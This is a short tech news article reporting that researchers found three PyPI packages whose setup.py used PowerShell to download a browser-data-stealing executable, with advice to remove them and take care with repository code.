Programmers: look out for these infostealers on the Python Package Index
Three packages were seen delivering infostealers
When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.
Three malicious packages carrying infostealers were recently discovered, and subsequently removed, from the PyPI repository.
Researchers from Fortinet found three packages, uploaded between January 7 and 12, by a user named “Lollip0p”. These three are called “colorslib”, “httpslib”, and “libhttps”, and if you’ve used them before, make sure to remove them immediately.
Usually, cybercriminals looking to compromisePythondeveloperendpointsvia PyPI will try typosquatting - giving their malicious packages names almost identical to others belonging to legitimate projects. That way, developers who are either reckless, or in a hurry, might unknowingly use the malicious one, instead of the clean one.
Stealing browser data
This campaign, however, is different, as these three have unique names. To build trust, the attacker drafted complete descriptions for the packages. While the total download count for these three hardly surpassed 500, it might still prove devastating if it’s a part of a larger supply chain, the publication states.
In all three cases, the attackers are distributing a file called “setup.py” which, after running a PowerShell, tries to download the “Oxyz.exe” executable from the internet. This executable, the researchers are saying, is malicious, and steals browser information. We don’t know exactly what type of information themalwareis looking to steal, but infostealers usually go for saved passwords, credit card data, cryptocurrency wallets, and other valuable information.
Malicious PyPi packages turn Discord into password-stealing malware>PyPl has been found hosting AWS keys and malware once again>These are the best laptops for programming right now
The report also found that the detection rate for these executables are relatively low (up to 13.5%), meaning the attackers can successfully siphon out data even from endpoints protected by antivirus solutions.
While the malicious packages have been removed from PyPI already, nothing is stopping the attackers from simply uploading them with a different name, and from a different account. That being said, the best way to protect against this type of supply chain attack is to be particularly careful when downloading code building blocks from repositories.
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
Via:BleepingComputer
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
7 myths about email security everyone should stop believing
Best Usenet client of 2024
Herman Miller Aeron gaming chair review: premium, highly customizable comfort
